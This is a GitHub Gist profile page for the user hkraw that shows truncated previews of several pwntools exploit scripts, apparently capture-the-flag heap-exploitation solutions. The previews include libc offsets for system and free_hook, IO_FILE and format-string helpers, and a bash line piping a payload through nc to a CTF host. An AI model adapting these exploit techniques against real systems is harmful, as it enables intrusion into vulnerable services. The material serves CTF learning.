Skip to content

Instantly share code, notes, and snippets.

View hkraw's full-sized avatar

Harsh khuha hkraw

View GitHub Profile
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from IO_FILE import *
from time import sleep
###Utils
def newins(instrument,data):
io.sendlineafter(': ','1')
io.sendlineafter('Instrument: ',instrument)
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#Utils
def create(type,number):
io.sendlineafter('>> ','1')
io.sendlineafter('> ',f'{type}')
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
#Utils
def addnote(idx,size,data,silent=False,shell=False):
io.sendlineafter('>> ','1')
!/usr/bin/python3
from pwn import *
from time import sleep
import random
#Utils
def newtab():
port = random.randint(3000,6000)
handler = listen(port)
io.sendlineafter('>> ','N')
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
####elf
libc = ELF('./libc-2.31.so')
####Utils
#!/usr/bin/python3
from pwn import *
libc = ELF('./libc-2.23.so')
####Utils
def alloc(size):
io.sendlineafter('>> ','1')
io.sendlineafter('>> ',str(size))
def free(idx):
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random
####Addr
leak_offset = 0x1b39e7
system = 0x4f4e0
```exploit.sh
#!/bin/bash
(cat payload; cat)|nc pynotes.darkarmy.xyz 32769
```
```payload
unsortedbinoffset = 0x3ebca0
aaa = 0x4f4e0
freehook = 0x3ed8e8
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from formatstring import *
import random
#Addr
gadget = 0xe58c3
stderr_libc = 0x3ec680
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
#libc
libc = ELF('./heapsoftrouble.libc')
#Utils